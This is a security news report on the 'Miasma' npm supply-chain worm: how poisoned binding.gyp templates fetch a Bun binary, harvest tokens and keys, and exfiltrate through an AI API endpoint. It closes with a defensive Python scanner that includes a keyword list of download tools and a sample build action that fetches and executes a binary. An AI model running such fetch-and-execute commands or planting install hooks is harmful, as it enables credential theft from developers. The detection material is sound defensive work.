A self-propagating npm worm has quietly infected at least 20 packages, possibly far more, by weaponizing a file the JavaScript development ecosystem already trusted: the binding.gyp build template used by native Node.js modules (The Register).
The campaign, dubbed Miasma by researchers, marks a structural step for npm supply-chain attacks. Where prior incidents leaned on typosquats, social-engineering of maintainers, or postinstall scripts that an attentive reviewer could catch, this worm moves the infection into a layer that thousands of legitimate packages already depend on. The Register's roundup, corroborated independently by Microsoft Security, JFrog, Snyk, Sonatype, Socket, and Tenable, gives the clearest picture yet of how the worm operates and why its targeting is so much broader than a single compromised maintainer.
The infection pivots on binding.gyp, the JSON-like build configuration that node-gyp consumes to compile native C++ add-ons. Snyk's teardown shows the poisoned template embeds shell code that runs during npm install and pulls down a self-contained Bun runtime binary, bun-v1.3.13, straight from the legitimate oven-sh/bun GitHub releases (Snyk). Bun is real, fast, and not flagged by antivirus tooling the way an unfamiliar binary might be. Once running, the worm uses Bun to harvest secrets from the host: GitHub classic tokens, fine-grained personal access tokens (github_pat_ prefix), npm publishing tokens (npm_ prefix), GitHub Actions JWTs (ghs_ prefix), SSH keys, cloud credentials, CI/CD environment variables, package registry tokens, shell history, IDE config files, and configuration from AI-coding assistants.
Exfiltration runs through a clever abuse of legitimate infrastructure. Rather than standing up its own server, the worm ships stolen credentials back through api.anthropic.com/v1/api, a real Anthropic endpoint used as camouflage (The Register); to anyone scanning outbound logs, the exfil traffic looks like ordinary API calls. Researchers have also surfaced a destructive tripwire: any attempt to revoke one of the stolen tokens appears to trigger a payload keyed to the string IfYouInvalidateThisTokenItWillNukeTheComputerOfTheOwner, which researchers read as a threat to wipe the original owner's machine. A second marker, the phrase 'Miasma: The Spreading Blight,' appears in repository descriptions and dead-drop commits.
The June 24 wave hit the LeoPlatform and RStreams ecosystems. Confirmed victims include @vapi-ai/server-sdk (about 86,500 weekly downloads), ai-sdk-ollama (about 36,900), autotel (about 5,900), and awaitly (about 280) (Socket). Each high-download victim is a foothold: every developer's npm install becomes a credential exfiltration event on their laptop, on CI runners, or inside container build pipelines that often hold production deploy keys. Sonatype, which tracks npm package risk continuously, has added hexo-deployer-wrangler@1.0.4, hexo-shoka-swiper@0.1.10, and prism-silq@1.0.1 to its confirmed-malicious list beyond the early reports (Sonatype). The same firm has, importantly, walked back earlier suspicions on three LeoPlatform packages, leo-connector-common@4.0.11-rc, leo-connector-postgres@4.0.19-beta, and leo-connector-entity-table@3.0.22-rc, which it now judges likely not malicious.
The June wave is not the worm's first run. In early June, a separate infection hit @redhat-cloud-services/* npm packages, and Microsoft's writeup treats that episode as a dry run for the same author's tradecraft (Microsoft Security Blog). JFrog's analysis shows how the worm uses GitHub as its propagation substrate: every harvested token with publish rights becomes a vector for new malicious package versions, and the attacker account liuende501 now hosts 321 public repositories in the <adjective>-<noun>-<number> pattern the worm generates (JFrog). Snyk tallies roughly 57 packages compromised across the worm's lifetime; the count differs from The Register's '20-plus' because the snapshots were taken at different moments.
The structural shift matters more than any single victim. Pre-Miasma, npm supply-chain compromises leaned on tricking a maintainer or waiting for someone to npm install a typosquatted name. The binding.gyp pivot moves the attacker into the build layer that legitimate native modules already require. Tenable's writeup frames it bluntly: the underground has absorbed the lesson that npm is an easy target, and tooling that automates propagation across maintainer accounts makes each successful compromise a self-funding source of the next one (Tenable). npm's trust model, where anyone can publish a package and thousands of downstream projects pull it in via npm install without further review, is what makes the worm cheap to run and keeps this kind of attack affordable for the next operator.
For developers, the immediate work is unglamorous: pin dependencies and commit lockfiles, audit postinstall and node-gyp runs in CI, isolate CI credentials with short-lived OIDC tokens rather than long-lived secrets, rotate any token, key, or cloud credential that may have lived on a developer laptop or build runner in the affected window, and watch for typosquats or sudden new publishers on packages you already depend on. The next trigger to watch is whether the attacker rotates off liuende501 and the Bun-binary delivery chain once defenders fingerprint it, a familiar pattern in self-propagating supply-chain worms and the one that will tell defenders whether this is a campaign or a template.
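As an added example (not code from the article or from any of the cited vendors), a Python scanner for the install-time surface the article describes and the "audit postinstall and node-gyp runs in CI" item above: it walks a node_modules tree, lists packages with preinstall/install/postinstall hooks or a binding.gyp that node-gyp would build implicitly, and flags gyp command expansions and build actions that fetch or run binaries. The indicator list and the sample binding.gyp are constructed assumptions for illustration, not Miasma signatures.

```python
import ast, json, re, pathlib

# Heuristic indicators chosen for this example (assumption: they are not Miasma signatures).
RISKY_COMMAND = re.compile(r"\b(curl|wget|bun|base64|chmod|sh -c|bash -c)\b")
COMMAND_EXPANSION = re.compile(r"<!@?\(")  # gyp executes the enclosed command at configure time

def load_gyp(text):
    """binding.gyp is JSON-like: accept strict JSON or a Python dict literal (gyp's own syntax)."""
    for parser in (json.loads, ast.literal_eval):
        try:
            return parser(text)
        except (ValueError, SyntaxError, TypeError):
            pass  # falls through to None when neither parser accepts the file

def scan_gyp(text):
    """Findings for one binding.gyp: command expansions and actions that fetch or run binaries."""
    findings = ["<!(...) expansion runs a shell command at configure time"] if COMMAND_EXPANSION.search(text) else []
    gyp = load_gyp(text)
    if gyp is None:
        return findings + ["binding.gyp could not be parsed"]
    for target in gyp.get("targets", []):
        for action in target.get("actions", []):
            cmd = " ".join(str(part) for part in action.get("action", []))
            if RISKY_COMMAND.search(cmd):
                findings.append(f"action {action.get('action_name')!r} runs: {cmd[:80]}")
    return findings

def scan_package(package_json, binding_gyp=None):
    """Report for one package from its package.json text and optional binding.gyp text."""
    scripts = json.loads(package_json).get("scripts", {})
    hooks = [k for k in ("preinstall", "install", "postinstall") if k in scripts]
    # npm runs `node-gyp rebuild` implicitly when binding.gyp exists and no install script is declared
    if binding_gyp is not None and "install" not in scripts:
        hooks.append("implicit node-gyp rebuild")
    return {"install_hooks": hooks, "gyp_findings": scan_gyp(binding_gyp) if binding_gyp else []}

def scan_node_modules(root):
    """Walk node_modules; return {package name: report} for each package that needs review."""
    flagged = {}
    for manifest in pathlib.Path(root).rglob("package.json"):
        gyp_path = manifest.parent / "binding.gyp"
        report = scan_package(manifest.read_text(), gyp_path.read_text() if gyp_path.is_file() else None)
        if report["install_hooks"] or report["gyp_findings"]:
            flagged[json.loads(manifest.read_text()).get("name", manifest.parent.name)] = report
    return flagged
# Constructed sample (not a real package): a build action that downloads and executes a binary.
SUSPICIOUS_GYP = """{'targets': [{'target_name': 'addon', 'sources': ['addon.cc'],
  'actions': [{'action_name': 'prep', 'inputs': [], 'outputs': ['x'],
    'action': ['sh', '-c', 'curl -sL https://example.invalid/bun -o bun && chmod +x bun && ./bun run']}]}]}"""
BENIGN_GYP = '{"targets": [{"target_name": "addon", "sources": ["addon.cc"]}]}'
```

Run scan_node_modules("node_modules") in CI and fail the build when the result contains a package that is not on an explicit allowlist; a benign native module still shows up with the implicit node-gyp hook, which is the point of reviewing it.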